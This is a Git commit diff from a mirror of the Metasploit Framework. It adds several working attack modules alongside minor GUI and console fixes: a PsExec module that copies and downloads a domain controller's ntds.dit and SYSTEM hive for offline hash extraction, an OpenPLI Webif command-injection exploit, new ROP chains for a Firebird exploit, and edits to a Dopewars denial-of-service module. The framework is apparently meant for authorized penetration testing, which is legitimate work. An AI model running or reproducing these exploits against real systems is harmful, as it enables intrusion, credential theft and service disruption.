infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/rapid7/metasploit-framework

bug/bundler_fix
Doug P 2013-03-14 16:10:10 -04:00
parent bbbf395659 40e801d345
commit 4bb64a0f41
11 changed files with 473 additions and 40 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/gui/msfgui.jar
View File

Binary file not shown.

4
external/source/gui/msfguijava/src/msfgui/MainFrame.form vendored
View File

@ -15,7 +15,7 @@
</DimensionLayout>
<DimensionLayout dim="1">
<Group type="103" groupAlignment="0" attributes="0">
<Component id="tabbedPane" alignment="1" pref="530" max="32767" attributes="0"/>
<Component id="tabbedPane" alignment="1" pref="534" max="32767" attributes="0"/>
</Group>
</DimensionLayout>
</Layout>
@ -308,7 +308,7 @@
<Property name="name" type="java.lang.String" value="credsTable" noResource="true"/>
</Properties>
<AuxValues>
<AuxValue name="JavaCodeGenerator_CreateCodeCustom" type="java.lang.String" value="new MsfTable(rpcConn, new String [] {&quot;Host&quot;, &quot;Time&quot;, &quot;Port&quot;, &quot;Proto&quot;, &quot;Sname&quot;, &quot;Type&quot;, &quot;User&quot;, &quot;Pass&quot;, &quot;Active&quot;&#xa; }, &quot;creds&quot;, new String[]{&quot;host&quot;, &quot;time&quot;, &quot;port&quot;, &quot;proto&quot;, &quot;sname&quot;, &quot;type&quot;, &quot;user&quot;, &quot;pass&quot;, &quot;active&quot;})"/>
<AuxValue name="JavaCodeGenerator_CreateCodeCustom" type="java.lang.String" value="new MsfTable(rpcConn, new String [] {&quot;Host&quot;, &quot;Updated&quot;, &quot;Port&quot;, &quot;Proto&quot;, &quot;Sname&quot;, &quot;Type&quot;, &quot;User&quot;, &quot;Pass&quot;, &quot;Active&quot;&#xa; }, &quot;creds&quot;, new String[]{&quot;host&quot;, &quot;updated_at&quot;, &quot;port&quot;, &quot;proto&quot;, &quot;sname&quot;, &quot;type&quot;, &quot;user&quot;, &quot;pass&quot;, &quot;active&quot;})"/>
</AuxValues>
</Component>
</SubComponents>

6
external/source/gui/msfguijava/src/msfgui/MainFrame.java vendored
View File

@ -527,8 +527,8 @@ nameloop: for (int i = 0; i < names.length; i++) {
lootsTable = new MsfTable(rpcConn,new String [] {"Host", "Service", "Ltype", "Ctype", "Data", "Created", "Updated", "Name", "Info"
}, "loots", new String[]{"host", "service", "ltype", "ctype", "data", "created_at", "updated_at", "name", "info"});
credsPane = new javax.swing.JScrollPane();
credsTable = new MsfTable(rpcConn, new String [] {"Host", "Time", "Port", "Proto", "Sname", "Type", "User", "Pass", "Active"
}, "creds", new String[]{"host", "time", "port", "proto", "sname", "type", "user", "pass", "active"});
credsTable = new MsfTable(rpcConn, new String [] {"Host", "Updated", "Port", "Proto", "Sname", "Type", "User", "Pass", "Active"
}, "creds", new String[]{"host", "updated_at", "port", "proto", "sname", "type", "user", "pass", "active"});
menuBar = new javax.swing.JMenuBar();
javax.swing.JMenu fileMenu = new javax.swing.JMenu();
connectRpcMenuItem = new javax.swing.JMenuItem();
@ -710,7 +710,7 @@ nameloop: for (int i = 0; i < names.length; i++) {
);
mainPanelLayout.setVerticalGroup(
mainPanelLayout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(tabbedPane, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, 530, Short.MAX_VALUE)
.addComponent(tabbedPane, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.DEFAULT_SIZE, 534, Short.MAX_VALUE)
);
menuBar.setName("menuBar"); // NOI18N

12
lib/msf/core/auxiliary/web.rb
View File

@ -156,7 +156,7 @@ module Auxiliary::Web
end
def log_fingerprint( opts = {} )
mode = details[:category].to_sym
mode = name
vhash = [target.to_url, opts[:fingerprint], mode, opts[:location]].
map { |x| x.to_s }.join( '|' ).hash
@ -187,12 +187,12 @@ module Auxiliary::Web
report_web_vuln( info )
print_good " FOUND(#{mode.to_s.upcase}) URL(#{location})"
print_good " FOUND(#{mode.to_s}) URL(#{location})"
print_good " PROOF(#{opts[:fingerprint]})"
end
def log_resource( opts = {} )
mode = details[:category].to_sym
mode = name
vhash = [target.to_url, mode, opts[:location]].
map { |x| x.to_s }.join( '|' ).hash
@ -221,12 +221,12 @@ module Auxiliary::Web
report_web_vuln( info )
print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})"
print_good " VULNERABLE(#{mode.to_s}) URL(#{target.to_url})"
print_good " PROOF(#{opts[:location]})"
end
def process_vulnerability( element, proof, opts = {} )
mode = details[:category].to_sym
mode = name
vhash = [target.to_url, mode, element.altered].
map{ |x| x.to_s }.join( '|' ).hash
@ -281,7 +281,7 @@ module Auxiliary::Web
report_web_vuln( info )
print_good " VULNERABLE(#{mode.to_s.upcase}) URL(#{target.to_url})" +
print_good " VULNERABLE(#{mode.to_s}) URL(#{target.to_url})" +
" PARAMETER(#{element.altered}) VALUES(#{element.params})"
print_good " PROOF(#{proof})"
end

2
lib/msf/core/auxiliary/web/path.rb
View File

@ -118,7 +118,7 @@ class Path < Fuzzable
end
def self.from_model( form )
e = new( :action => "#{form.path}?#{form.query}", :input => inputs[0][1] )
e = new( :action => "#{form.path}?#{form.query}", :input => form.inputs[0][1] )
e.model = form
e
end

90
lib/msf/ui/console/command_dispatcher/db.rb
View File

@ -1,5 +1,5 @@
# -*- coding: binary -*-
#
require 'rexml/document'
require 'rex/parser/nmap_xml'
require 'msf/core/db_export'
@ -975,8 +975,15 @@ class Db
end
def cmd_loot_help
print_line "Usage: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
print_line "Usage: loot <options>"
print_line " Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]"
print_line " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]"
print_line " Del: loot -d [addr1 addr2 ...]"
print_line
print_line " -a,--add Add loot to the list of addresses, instead of listing"
print_line " -d,--delete Delete *all* loot matching host and type"
print_line " -f,--file File with contents of the loot to add"
print_line " -i,--info Info of the loot to add"
print_line " -t <type1,type2> Search for a list of types"
print_line " -h,--help Show this help information"
print_line " -S,--search Search string to filter by"
@ -991,31 +998,52 @@ class Db
types = nil
delete_count = 0
search_term = nil
file = nil
name = nil
info = nil
while (arg = args.shift)
case arg
when '-d','--delete'
mode = :delete
when '-t'
typelist = args.shift
if(!typelist)
print_status("Invalid type list")
when '-a','--add'
mode = :add
when '-d','--delete'
mode = :delete
when '-f','--file'
filename = args.shift
if(!filename)
print_error("Can't make loot with no filename")
return
end
if (!File.exists?(filename) or !File.readable?(filename))
print_error("Can't read file")
return
end
when '-i','--info'
info = args.shift
if(!info)
print_error("Can't make loot with no info")
return
end
types = typelist.strip().split(",")
when '-S', '--search'
search_term = /#{args.shift}/nmi
when '-h','--help'
cmd_loot_help
return
else
# Anything that wasn't an option is a host to search for
unless (arg_host_range(arg, host_ranges))
when '-t'
typelist = args.shift
if(!typelist)
print_error("Invalid type list")
return
end
types = typelist.strip().split(",")
when '-S', '--search'
search_term = /#{args.shift}/nmi
when '-h','--help'
cmd_loot_help
return
else
# Anything that wasn't an option is a host to search for
unless (arg_host_range(arg, host_ranges))
return
end
end
end
tbl = Rex::Ui::Text::Table.new({
'Header' => "Loot",
'Columns' => [ 'host', 'service', 'type', 'name', 'content', 'info', 'path' ],
@ -1024,6 +1052,32 @@ class Db
# Sentinal value meaning all
host_ranges.push(nil) if host_ranges.empty?
if mode == :add
if info.nil?
print_error("Info required")
return
end
if filename.nil?
print_error("Loot file required")
return
end
if types.nil? or types.size != 1
print_error("Exactly one loot type is required")
return
end
type = types.first
name = File.basename(filename)
host_ranges.each do |range|
range.each do |host|
file = File.open(filename, "rb")
contents = file.read
lootfile = framework.db.find_or_create_loot(:type => type, :host => host,:info => info, :data => contents,:path => filename,:name => name)
print_status "Added loot #{host}"
end
end
return
end
each_host_range_chunk(host_ranges) do |host_search|
framework.db.hosts(framework.db.workspace, false, host_search).each do |host|
host.loots.each do |loot|

270
modules/auxiliary/admin/smb/psexec_ntdsgrab.rb Normal file
View File

@ -0,0 +1,270 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Remote::SMB::Psexec
include Msf::Exploit::Remote::SMB::Authenticated
include Msf::Auxiliary::Report
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::SimpleClient
XCEPT= Rex::Proto::SMB::Exceptions
CONST= Rex::Proto::SMB::Constants
def initialize(info = {})
super(update_info(info,
'Name' => 'PsExec NTDS.dit And SYSTEM Hive Download Utility',
'Description'=> %q{
This module authenticates to an Active Directory Domain Controller and creates
a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the
ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM
hive copy can be used in combination with other tools for offline extraction of AD
password hashes. All of this is done without uploading a single binary to the
target host.
},
'Author' => [
'Royce Davis <rdavis[at]accuvant.com>' # @R3dy__
],
'License'=> MSF_LICENSE,
'References' => [
[ 'URL', 'http://sourceforge.net/projects/smbexec' ],
[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ]
],
))
register_options([
OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']),
OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']),
OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']),
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
# This is the main control method
def run
# Initialize some variables
text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt"
bat = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat"
createvsc = "vssadmin create shadow /For=%SYSTEMDRIVE%"
@ip = datastore['RHOST']
@smbshare = datastore['SMBSHARE']
# Try and connect
if connect
#Try and authenticate with given credentials
begin
smb_login
rescue StandardError => autherror
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
return
end
# If a VSC was specified then don't try and create one
if datastore['VSCPATH'].length > 0
print_status("#{peer} - Attempting to copy NTDS.dit from #{datastore['VSCPATH']}")
vscpath = datastore['VSCPATH']
else
unless datastore['CREATE_NEW_VSC'] == true
vscpath = check_vss(text, bat)
end
unless vscpath
vscpath = make_volume_shadow_copy(createvsc, text, bat)
end
end
if vscpath
if copy_ntds(vscpath, text) and copy_sys_hive
download_ntds((datastore['WINPATH'] + "\\Temp\\ntds"))
download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys"))
else
print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.")
end
end
cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys")
disconnect
end
end
# Thids method will check if a Volume Shadow Copy already exists and use that rather
# then creating a new one
def check_vss(text, bat)
begin
print_status("#{peer} - Checking if a Volume Shadow Copy exists already.")
prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'
command = "%COMSPEC% /C echo vssadmin list shadows ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
result = psexec(command)
data = smb_read_file(datastore['SMBSHARE'], @ip, text)
vscs = []
data.each_line { |line| vscs << line if line.include?("GLOBALROOT") }
if vscs.empty?
print_status("#{peer} - No VSC Found.")
return nil
end
vscpath = prepath + vscs[vscs.length - 1].to_s.split("ShadowCopy")[1].to_s.chomp
print_good("#{peer} - Volume Shadow Copy exists on #{vscpath}")
return vscpath
rescue StandardError => vsscheckerror
print_error("#{peer} - Unable to determine if VSS is enabled: #{vsscheckerror}")
return nil
end
end
# Create a Volume Shadow Copy on the target host
def make_volume_shadow_copy(createvsc, text, bat)
begin
#Try to create the shadow copy
command = "%COMSPEC% /C echo #{createvsc} ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}"
print_status("#{peer} - Creating Volume Shadow Copy")
out = psexec(command)
#Get path to Volume Shadow Copy
vscpath = get_vscpath(text)
rescue StandardError => vscerror
print_error("#{peer} - Unable to create the Volume Shadow Copy: #{vscerror}")
return nil
end
if vscpath
print_good("#{peer} - Volume Shadow Copy created on #{vscpath}")
return vscpath
else
return nil
end
end
# Copy ntds.dit from the Volume Shadow copy to the Windows Temp directory on the target host
def copy_ntds(vscpath, text)
begin
ntdspath = vscpath.to_s + "\\" + datastore['WINPATH'] + "\\NTDS\\ntds.dit"
command = "%COMSPEC% /C copy /Y \"#{ntdspath}\" %WINDIR%\\Temp\\ntds"
run = psexec(command)
if !check_ntds(text)
return false
end
return true
rescue StandardError => ntdscopyerror
print_error("#{peer} - Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}")
return false
end
end
# Checks if ntds.dit was copied to the Windows Temp directory
def check_ntds(text)
print_status("#{peer} - Checking if NTDS.dit was copied.")
check = "%COMSPEC% /C dir \\#{datastore['WINPATH']}\\Temp\\ntds > #{text}"
run = psexec(check)
output = smb_read_file(@smbshare, @ip, text)
if output.include?("ntds")
return true
end
return false
end
# Copies the SYSTEM hive file to the Temp directory on the target host
def copy_sys_hive
begin
# Try to crate the sys hive copy
command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y"
return psexec(command)
rescue StandardError => hiveerror
print_error("#{peer} - Unable to copy the SYSTEM hive file: #{hiveerror}")
return false
end
end
# Download the ntds.dit copy to your attacking machine
def download_ntds(file)
print_status("#{peer} - Downloading ntds.dit file")
begin
# Try to download ntds.dit
simple.connect("\\\\#{@ip}\\#{@smbshare}")
remotefile = simple.open("#{file}", 'rob')
data = remotefile.read
remotefile.close
ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit")
print_good("#{peer} - ntds.dit stored at #{ntds_path}")
rescue StandardError => ntdsdownloaderror
print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}")
return ntdsdownloaderror
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
# Download the SYSTEM hive copy to your attacking machine
def download_sys_hive(file)
print_status("#{peer} - Downloading SYSTEM hive file")
begin
# Try to download SYSTEM hive
simple.connect("\\\\#{@ip}\\#{@smbshare}")
remotefile = simple.open("#{file}", 'rob')
data = remotefile.read
remotefile.close
hive_path = store_loot("psexec.ntdsgrab.hive", "application/octet-stream", @ip, data, "system-hive")
print_good("#{peer} - SYSTEM hive stored at #{hive_path}")
rescue StandardError => sysdownloaderror
print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}")
return sysdownloaderror
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
# Gets the path to the Volume Shadow Copy
def get_vscpath(file)
begin
prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy'
vsc = ""
output = smb_read_file(@smbshare, @ip, file)
output.each_line do |line|
vsc += line if line.include?("GLOBALROOT")
end
return prepath + vsc.split("ShadowCopy")[1].chomp
rescue StandardError => vscpath_error
print_error("#{peer} - Could not determine the exact path to the VSC check your WINPATH")
return nil
end
end
# Removes files created during execution.
def cleanup_after(*files)
simple.connect("\\\\#{@ip}\\#{@smbshare}")
print_status("#{peer} - Executing cleanup...")
files.each do |file|
begin
if smb_file_exist?(file)
smb_file_rm(file)
end
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}")
end
end
left = files.collect{ |f| smb_file_exist?(f) }
if left.any?
print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
else
print_status("#{peer} - Cleanup was successful")
end
simple.disconnect("\\\\#{@ip}\\#{@smbshare}")
end
end

2
modules/auxiliary/dos/http/apache_mod_isapi.rb
View File

@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
def run
serverIP = datastore['RHOST']
if (datastore['RPORT'].o_i != 80)
if (datastore['RPORT'].to_i != 80)
serverIP += ":" + datastore['RPORT'].to_s
end
isapiURI = datastore['ISAPI']

15
modules/auxiliary/dos/dopewars/dopewars.rb → modules/auxiliary/dos/misc/dopewars.rb
View File

@ -16,17 +16,20 @@ class Metasploit4 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Dopewars Denial of Service',
'Description' => %q{
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to
a lack of input validation.
},
'Author' => [ 'Doug Prostko <dougtko[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '36606' ],
[ 'CVE', '2009-3591' ],
]))
[ 'OSVDB', '58884' ],
[ 'BID', '36606' ]
],
'DisclosureDate' => "Oct 05 2009" ))
register_options([Opt::RPORT(7902),], self.class)
register_options([Opt::RPORT(7902)], self.class)
end
def run
@ -44,13 +47,13 @@ class Metasploit4 < Msf::Auxiliary
disconnect
print_status("Checking for success...")
sleep 2
select(nil, nil, nil, 2)
begin
connect
rescue ::Interrupt
raise $!
rescue ::Rex::ConnectionRefused
print_good("Dopewars server succesfully shut down!")
print_good("Dopewars server successfully shut down!")
else
print_error("DOS attack unsuccessful")
ensure

77
modules/exploits/linux/http/dreambox_openpli_shell.rb Normal file
View File

@ -0,0 +1,77 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenPLI Webif Arbitrary Command Execution',
'Description' => %q{
Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command
injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means
that you will not see any output of your command. A ping command can be used for
testing the vulnerability. This module has been tested in a box with the next
features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1
Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware
1.06 and Web Interface 6.0.4-Expert (PLi edition).
},
'Author' => [ 'm-1-k-3' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '90230' ],
[ 'BID', '57943' ],
[ 'EDB', '24498' ],
[ 'URL', 'http://openpli.org/wiki/Webif' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ]
],
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat generic'
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 08 2013'
))
end
def exploit
print_status("#{rhost}:#{rport} - Sending remote command...")
vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
begin
send_request_cgi(
{
'uri' => normalize_uri("cgi-bin", "setConfigSettings"),
'method' => 'GET',
'vars_get' => {
"maxmtu" => "1500&#{payload.encoded}&"
}
})
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
end
end
end

35
modules/exploits/windows/misc/fb_cnct_group.rb
View File

@ -48,10 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Targets' =>
[
# pivots are pointers to stack pivots
# pivots are pointers to stack pivots of size 0x28
[ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],
[ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],
[ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],
[ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],
[ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]
],
'DefaultTarget' => 0,
@ -124,10 +125,18 @@ class Metasploit3 < Msf::Exploit::Remote
rop_chain = [
0x0055b844, # MOV EAX,EDI # RETN [fbserver.exe]
0x4a86ee77, # POP ECX # RETN [icuuc30.dll]
0x000001c0, # 0x000001c0-> ebp
0x000001c0, # 0x000001c0-> ecx
0x005aee63, # ADD EAX,ECX # RETN [fbserver.exe]
0x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll]
].pack("V*")
when 'Windows FB 2.1.4.18393'
rop_chain = [
0x0042264c, # MOV EAX,EDI # RETN [fbserver.exe]
0x4a8026e1, # POP ECX # RETN [icuuc30.dll]
0x000001c0, # 0x000001c0-> ecx
0x004c5499, # ADD EAX,ECX # RETN [fbserver.exe]
0x4a847664, # XCHG EAX,ESP # RETN [icuuc30.dll]
].pack("V*")
when 'Debug'
rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")
end
@ -196,7 +205,27 @@ class Metasploit3 < Msf::Exploit::Remote
0x00577605, # POP EAX # RETN [fbserver.exe]
0x90909090, # nop
0x004530ce, # PUSHAD # RETN [fbserver.exe]
].flatten.pack("V*")
].pack("V*")
when 'Windows FB 2.1.4.18393'
rop_chain = [
0x4a843429, # POP ECX # RETN [icuuc30.dll]
0x005ca120, # ptr to &VirtualAlloc() [IAT fbserver.exe]
0x0055a870, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]
0x004cecf6, # XCHG EAX,ESI # RETN [fbserver.exe]
0x004279c0, # POP EBP # RETN [fbserver.exe]
0x0040747d, # & call esp [fbserver.exe]
0x004ebef1, # POP EBX # RETN [fbserver.exe]
0x00001000, # 0x00001000-> ebx
0x4a864c5e, # POP EDX # RETN [icuuc30.dll]
0x00001000, # 0x00001000-> edx
0x004eaa3b, # POP ECX # RETN [fbserver.exe]
0x00000040, # 0x00000040-> ecx
0x4a8330a2, # POP EDI # RETN [icuuc30.dll]
0x00423b82, # RETN (ROP NOP) [fbserver.exe]
0x0046b5b1, # POP EAX # RETN [fbserver.exe]
0x90909090, # nop
0x004c8cfc, # PUSHAD # RETN [fbserver.exe]
].pack("V*")
when 'Debug'
rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")
end